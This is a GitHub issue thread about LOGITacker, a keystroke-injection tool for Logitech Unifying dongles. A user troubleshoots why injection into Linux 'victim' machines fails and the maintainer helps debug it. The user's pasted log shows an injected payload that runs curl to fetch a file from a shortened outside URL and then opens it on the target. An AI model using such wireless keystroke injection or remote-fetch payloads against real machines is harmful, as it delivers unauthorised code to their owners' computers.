RoganDawes/LOGITacker #43: Injecting commands on Linux

sogewasp, 2020-01-08:
Hello it's me again,

I've managed to inject commands on Windows machines and it works like a charm.
Then I tried to inject on Linux but nothing happens. I get the feedback from the command line which informs me that the commands are sent, but on the Linux victim machine nothing happens.
Any idea why ?
I've tried on a Kali 2018 and 2019 image, but I don't think this really matters...
Also my payload is something like:

```
press GUI
delay 500
string terminal
press ENTER
delay 500
```

but again I think this depends neither on this.

RoganDawes, 2020-01-08:
Try just typing out some text into an already open text editor/terminal as
a first check that everything is working?

Otherwise, you can try evtest on the /dev/input/n node that corresponds to
the Logitech receiver to see what is happening, perhaps?

sogewasp, 2020-01-09:
Thank you for your quick response.

I've tried injecting strings on different Linux versions but nothing happens on /dev/input/mouse0

It's very strange. Even on MacOS the injection works.

RoganDawes, 2020-01-10:
Are you sure that is the correct input device?

sogewasp, 2020-01-10:
Yes I am, the device disappears and reappears each time I plug the dongle and I have this output while I use it:
```
root@kali:~# dd if=/dev/input/mouse3 count=10000 bs=8 2>/dev/null | od -t x1 -A n
 28 08 e5 08 02 00 28 02 ff 08 05 00 08 09 01 08
 09 03 08 07 01 08 08 01 08 04 04 08 02 04 08 00
 01 18 ff 02 08 00 01 18 ff 01 18 fe 01 18 fc 01
 18 fb 01 18 fb 02 38 fa ff 18 f8 00 18 f9 00 18
 fa 00 18 fc 00 38 fc fe 38 fd fe 38 ff ff 38 fe
 ff 18 ff 00 28 00 ff 28 00 ff 08 01 00 08 01 00
 18 fe 00 18 fb 00 38 f9 ff 18 f7 01 18 f6 02 18
 f6 04 18 f6 03 18 f8 01 18 f9 01 18 f9 00 38 f9
```

But then nothing happens when I inject commands with LOGITacker.

RoganDawes, 2020-11-25:
Sorry for the delay on this.

It's important to note that the LOGITacker dongle enumerates as multiple devices on the HOST computer that it is plugged into, while you of course are looking for the input devices on the TARGET computer, which would be the ones associated with the Logitech Unifying dongle.

I would suggest using `evtest` to verify that you are using the correct device input node. On my computer, I have:

```
rogan@nemesis:~/workspace/LOGITacker$ sudo evtest
[sudo] password for rogan: 
No device specified, trying to scan all of /dev/input/event*
Available devices:
/dev/input/event0:	Sleep Button
/dev/input/event1:	Lid Switch
/dev/input/event2:	Power Button
/dev/input/event3:	AT Translated Set 2 keyboard
/dev/input/event4:	Logitech Wireless Keyboard PID:4023
/dev/input/event5:	Logitech Wireless Mouse
/dev/input/event6:	ThinkPad Extra Buttons
/dev/input/event7:	Integrated Camera: Integrated C
/dev/input/event8:	SynPS/2 Synaptics TouchPad
/dev/input/event9:	TPPS/2 IBM TrackPoint
/dev/input/event10:	Video Bus
/dev/input/event11:	Video Bus
/dev/input/event12:	PC Speaker
/dev/input/event13:	HDA NVidia HDMI/DP,pcm=3
/dev/input/event14:	HDA NVidia HDMI/DP,pcm=7
/dev/input/event15:	HDA NVidia HDMI/DP,pcm=8
/dev/input/event16:	HDA NVidia HDMI/DP,pcm=9
/dev/input/event17:	HDA NVidia HDMI/DP,pcm=10
/dev/input/event18:	HDA NVidia HDMI/DP,pcm=11
/dev/input/event19:	HDA Intel PCH Mic
/dev/input/event20:	HDA Intel PCH Dock Mic
/dev/input/event21:	HDA Intel PCH Dock Headphone
/dev/input/event22:	HDA Intel PCH Headphone
/dev/input/event23:	HDA Intel PCH HDMI/DP,pcm=3
/dev/input/event24:	HDA Intel PCH HDMI/DP,pcm=7
/dev/input/event25:	HDA Intel PCH HDMI/DP,pcm=8
/dev/input/event26:	HDA Intel PCH HDMI/DP,pcm=9
/dev/input/event27:	HDA Intel PCH HDMI/DP,pcm=10
Select the device event number [0-27]: 
```
And I would use `/dev/input/4` (Logitech Wireless Keyboard PID:4023, not the Mouse) to check for incoming keystrokes.

sogewasp, 2024-02-25:
After few years I am back to this issue.
Apparently when I try to inject into a Linux machine nothing happens. I used `evtest` as you suggested, and when I inject nothing happens, no event at all. Weird.

Is it possible that I am the only one having this issue ? What am I missing ?
Also, I have both an **nrf52840** dongle and an **April Brother**, tested with both, same results.

```
LOGITacker $ version
LOGITacker by MaMe82
Version: v0.2.2-beta
LOGITacker $ 
```

Here is screen log : 
```
LOGITacker $ options show
stats
        boot count                              : 25

global options
        boot mode                               : Discover
        working mode                            : Unifying compatible
        USB injection mode (trigger)            : Start USB injection once powered up (less accurate, works on all OS)

discover mode options
        action after RF address discovered      : continue in discover mode after a device address has been discovered
        pass RF frames to USB raw HID           : off
        auto store plain injectable devices     : on

passive-enumeration mode options
        pass key reports to USB keyboard        : off
        pass mouse reports to USB mouse         : off
        pass all RF frames to USB raw HID       : off

pair-sniff mode options
        action after sniffed pairing            : start passive enumeration mode after successfully sniffed pairing
        auto store devices from sniffed pairing : on
        pass RF frames to USB raw HID           : off

inject mode options
        keyboard language layout                : us
        default script                          : '<none>'
        maximum auto-injects per device         : 5
        action after successful injection       : stay in injection mode after successful injection
        action after failed injection           : stay in injection mode after failed injection
LOGITacker $ 
LOGITacker $ discover run
<info> LOGITACKER_PROCESSOR_INJECT: Stop injection mode for address xx:xx:xx:xx:xx
<info> LOGITACKER_RADIO: Channel hopping stopped
<info> LOGITACKER: Entering discover mode
<info> LOGITACKER_RADIO: Channel hopping stopped
<info> ESB_ILLEGALMOD: Using channel table 'Unifying reduced'
<info> ESB_ILLEGALMOD: New channel table with length 12
<info> LOGITACKER_PROCESSOR_DISCOVER: discover: no RX on current channel for 500 ms ... restart channel hopping ...
<info> LOGITACKER_RADIO: Channel hopping started
<info> LOGITACKER_RADIO: Channel hopping stopped
<info> LOGITACKER_PROCESSOR_DISCOVER: DISCOVERY: received valid ESB frame (addr xx:xx:xx:xx:xx, len: 15, ch idx 0, raw ch 5, rssi 41)
<info> LOGITACKER_PROCESSOR_DISCOVER: discovered device is Logitech
<info> LOGITACKER_PROCESSOR_DISCOVER: DISCOVERY: received valid ESB frame (addr xx:xx:xx:xx:xx, len: 10, ch idx 0, raw ch 5, rssi 44)
<info> LOGITACKER_PROCESSOR_DISCOVER: discovered device is Logitech
<info> LOGITACKER_PROCESSOR_DISCOVER: discover: no RX on current channel for 500 ms ... restart channel hopping ...
<info> LOGITACKER_RADIO: Channel hopping started
<info> ESB_ILLEGALMOD: dropped promiscuous frame with wrong logitech checksum
<info> LOGITACKER_RADIO: Channel hopping stopped
<info> LOGITACKER_PROCESSOR_DISCOVER: DISCOVERY: received valid ESB frame (addr xx:xx:xx:xx:xx, len: 20, ch idx 5, raw ch 35, rssi 43)
<info> LOGITACKER_PROCESSOR_DISCOVER: discovered device is Logitech
<info> LOGITACKER_PROCESSOR_DISCOVER: DISCOVERY: received valid ESB frame (addr xx:xx:xx:xx:xx, len: 10, ch idx 5, raw ch 35, rssi 45)
<info> LOGITACKER_PROCESSOR_DISCOVER: discovered device is Logitech
<info> LOGITACKER_PROCESSOR_DISCOVER: DISCOVERY: received valid ESB frame (addr xx:xx:xx:xx:xx, len: 10, ch idx 5, raw ch 35, rssi 46)
<info> LOGITACKER_PROCESSOR_DISCOVER: discovered device is Logitech
[... 54 lines cut ...]
<info> LOGITACKER_PROCESSOR_INJECT: DELAY end reached
<info> LOGITACKER_PROCESSOR_INJECT: inject task succeeded
<info> LOGITACKER_PROCESSOR_INJECT: process key-combo injection: ENTER
<info> LOGITACKER_KEYBOARD_MAP: Token 0: ENTER
<info> LOGITACKER_PROCESSOR_INJECT: inject task succeeded
<info> LOGITACKER_PROCESSOR_INJECT: process delay injection: 200 milliseconds
<info> LOGITACKER_PROCESSOR_INJECT: DELAY end reached
<info> LOGITACKER_PROCESSOR_INJECT: inject task succeeded
<info> LOGITACKER_PROCESSOR_INJECT: process string injection: curl -Lko t.gif https://t.ly/O1Pn7
<info> LOGITACKER_PROCESSOR_INJECT: inject task succeeded
<info> LOGITACKER_PROCESSOR_INJECT: process delay injection: 350 milliseconds
<info> LOGITACKER_PROCESSOR_INJECT: DELAY end reached
<info> LOGITACKER_PROCESSOR_INJECT: inject task succeeded
<info> LOGITACKER_PROCESSOR_INJECT: process string injection: open t.gif
<info> LOGITACKER_PROCESSOR_INJECT: inject task succeeded
<info> LOGITACKER_PROCESSOR_INJECT: process delay injection: 200 milliseconds
<info> LOGITACKER_PROCESSOR_INJECT: DELAY end reached
<info> LOGITACKER_PROCESSOR_INJECT: inject task succeeded
<info> LOGITACKER_PROCESSOR_INJECT: No more tasks scheduled
<info> LOGITACKER_PROCESSOR_INJECT: script execution succeeded
LOGITacker (injection) $ 
```

Victim side I have an empty `evtest` output, like no event at all.
On the other hand, a Windows victim machine is correctly injected.

RoganDawes, 2024-02-25:
That is very strange. Using the same Logitech dongle on both Windows and Linux? It's possible I gave you the wrong evtest device to monitor. Could you try the mouse as well?

sogewasp, 2024-02-26:
Yes, it's the same dongle on both OS, it's a Logitech U0007, from an M705 mouse.

While using the mouse I can see the corresponding events on `evtest`, so it is the right device.

sogewasp, 2024-02-26:
Uh, but I don't have two devices on my Linux, that's why.

```
sogewasp@ubuntu:~# evtest
No device specified, trying to scan all of /dev/input/event*
Available devices:
/dev/input/event0:      Lid Switch
/dev/input/event1:      Power Button
/dev/input/event2:      AT Translated Set 2 keyboard
/dev/input/event3:      Ideapad extra buttons
/dev/input/event4:      Integrated Camera: Integrated C
/dev/input/event5:      Video Bus
/dev/input/event6:      SYNA2DE6:00 09BB:DA3B Mouse
/dev/input/event7:      SYNA2DE6:00 09BB:DA3B Touchpad
/dev/input/event8:      HDA Intel PCH Mic
/dev/input/event9:      HDA Intel PCH Headphone
/dev/input/event10:     HDA Intel PCH HDMI/DP,pcm=3
/dev/input/event11:     HDA Intel PCH HDMI/DP,pcm=7
/dev/input/event12:     HDA Intel PCH HDMI/DP,pcm=8
/dev/input/event13:     HDA Intel PCH HDMI/DP,pcm=9
/dev/input/event14:     Logitech M705
Select the device event number [0-14]: 14
Input driver version is 1.0.1
Input device ID: bus 0x3 vendor 0x46d product 0x101b version 0x111
Input device name: "Logitech M705"
Supported events:
  Event type 0 (EV_SYN)
  Event type 1 (EV_KEY)
    Event code 272 (BTN_LEFT)
    Event code 273 (BTN_RIGHT)
    Event code 274 (BTN_MIDDLE)
    Event code 275 (BTN_SIDE)
    Event code 276 (BTN_EXTRA)
    Event code 277 (BTN_FORWARD)
    Event code 278 (BTN_BACK)
    Event code 279 (BTN_TASK)
    Event code 280 (?)
    Event code 281 (?)
    Event code 282 (?)
    Event code 283 (?)
    Event code 284 (?)
    Event code 285 (?)
    Event code 286 (?)
    Event code 287 (?)
  Event type 2 (EV_REL)
    Event code 0 (REL_X)
    Event code 1 (REL_Y)
    Event code 6 (REL_HWHEEL)
    Event code 8 (REL_WHEEL)
    Event code 11 (REL_WHEEL_HI_RES)
    Event code 12 (REL_HWHEEL_HI_RES)
  Event type 4 (EV_MSC)
    Event code 4 (MSC_SCAN)
Properties:
Testing ... (interrupt to exit)
Event: time 1708981975.802785, type 4 (EV_MSC), code 4 (MSC_SCAN), value 90001
Event: time 1708981975.802785, type 1 (EV_KEY), code 272 (BTN_LEFT), value 1
Event: time 1708981975.802785, -------------- SYN_REPORT ------------
Event: time 1708981975.974810, type 4 (EV_MSC), code 4 (MSC_SCAN), value 90001
Event: time 1708981975.974810, type 1 (EV_KEY), code 272 (BTN_LEFT), value 0
Event: time 1708981975.974810, -------------- SYN_REPORT ------------
```

sogewasp, 2024-02-26:
Here is what `munifying` is saying about my device : 

```
$ sudo ./munifying info
Logitech Unifying dongle found
Using dongle USB config: Configuration 1
Resetting dongle in order to release it from kernel (connected devices won't be usable)
EP descr: ep #1 IN (address 0x81) interrupt - undefined usage [8 bytes]
EP descr: ep #2 IN (address 0x82) interrupt - undefined usage [8 bytes]
EP descr: ep #3 IN (address 0x83) interrupt - undefined usage [32 bytes]
HID++ interface: vid=046d,pid=c52b,bus=1,addr=64,config=1,if=2,alt=0
HID++ interface IN endpoint: ep #3 IN (address 0x83) interrupt - undefined usage [32 bytes]
Dongle Info
-------------------------------------
        Firmware (maj.minor.build):  RQR12.10.B0032
        Bootloader (maj.minor):      02.15
        WPID:                        8802
        (likely) protocol:           0x04
        Serial:                      a7:bf:82:7d
        Connected devices:           1

Device Info for device index index 0
-------------------------------------
        Destination ID:              0x07
        Default report interval:     8ms
        WPID:                        101b
        Device type:                 0x02 (MOUSE)
        Serial:                      27:12:78:0b
        Report types:                00000004 (Report types: mouse )
        Capabilities:                06 (Unifying compatible, link encryption disabled)
        Usability Info:              0x01 (power switch location on the base)
        Name:                        M705
        RF address:                  a7:bf:82:7d:08
        KeyData:                     00
        Key:                         none (no link encryption in use or key not extractable)

Closing Logitech receiver in Firmware mode (not bootloader)...
```

sogewasp, 2024-02-26:
I managed to pair a dongle I had hanging around, which wasn't paired at all, and with this one injecting on Linux works fine.
So I suppose the problem with the other one is that Linux sees it as a mouse and not a keyboard ?

```
$ sudo ./munifying pair
Logitech Unifying dongle found
Using dongle USB config: Configuration 1
Resetting dongle in order to release it from kernel (connected devices won't be usable)
EP descr: ep #1 IN (address 0x81) interrupt - undefined usage [8 bytes]
EP descr: ep #2 IN (address 0x82) interrupt - undefined usage [8 bytes]
EP descr: ep #3 IN (address 0x83) interrupt - undefined usage [32 bytes]
HID++ interface: vid=046d,pid=c52b,bus=1,addr=67,config=1,if=2,alt=0
HID++ interface IN endpoint: ep #3 IN (address 0x83) interrupt - undefined usage [32 bytes]
Enable pairing for 60 seconds
USB Report type: HID++ short message, DeviceID: 0xff, SubID: RECEIVER LOCKING INFORMATION, Params: 0x01 0x00 0x00 0x00
        Lock open: true
        Lock error: no error
USB Report type: HID++ short message, DeviceID: 0xff, SubID: SET REGISTER SHORT, Params: 0xb2 0x00 0x00 0x00
        Register address: REGISTER PAIRING
        Value: 0x00 0x00 0x00
... Enable pairing response (should be enabled)

Printing follow up reports ...
DEVICE CONNECTION ON INDEX: 01 TYPE: KEYBOARD WPID: 0x1337 ENCRYPTED: true CONNECTED: false
New device paired
USB Report type: HID++ short message, DeviceID: 0xff, SubID: RECEIVER LOCKING INFORMATION, Params: 0x00 0x00 0x00 0x00
        Lock open: false
        Lock error: no error
Dongle Info
-------------------------------------
        Firmware (maj.minor.build):  RQR12.03.B0025
        Bootloader (maj.minor):      02.15
        WPID:                        8802
        (likely) protocol:           0x04
        Serial:                      b7:bf:82:7b
        Connected devices:           1

Device Info for device index index 0
-------------------------------------
        Destination ID:              0x07
        Default report interval:     8ms
        WPID:                        1337
        Device type:                 0x01 (KEYBOARD)
        Serial:                      27:12:78:02
        Report types:                0000401e (Report types: keyboard mouse multimedia power keys keyboard LEDs )
        Capabilities:                05 (Unifying compatible, link encryption enabled)
        Usability Info:              0x09 (power switch location on the top edge)
        Name:                        LOGITacker
        RF address:                  b7:bf:82:7b:07
        KeyData:                     00
        Key:                         none (no link encryption in use or key not extractable)

Closing Logitech receiver in Firmware mode (not bootloader)...
```

RoganDawes, 2024-02-27:
Yeah, it seems like this might be a Linux driver problem. Do you have an actual keyboard that you can pair with that dongle and see if it works under Linux?

sogewasp, 2024-02-27:
No I don't have one right now, I'll try to find one in the next days but I can't assure anything.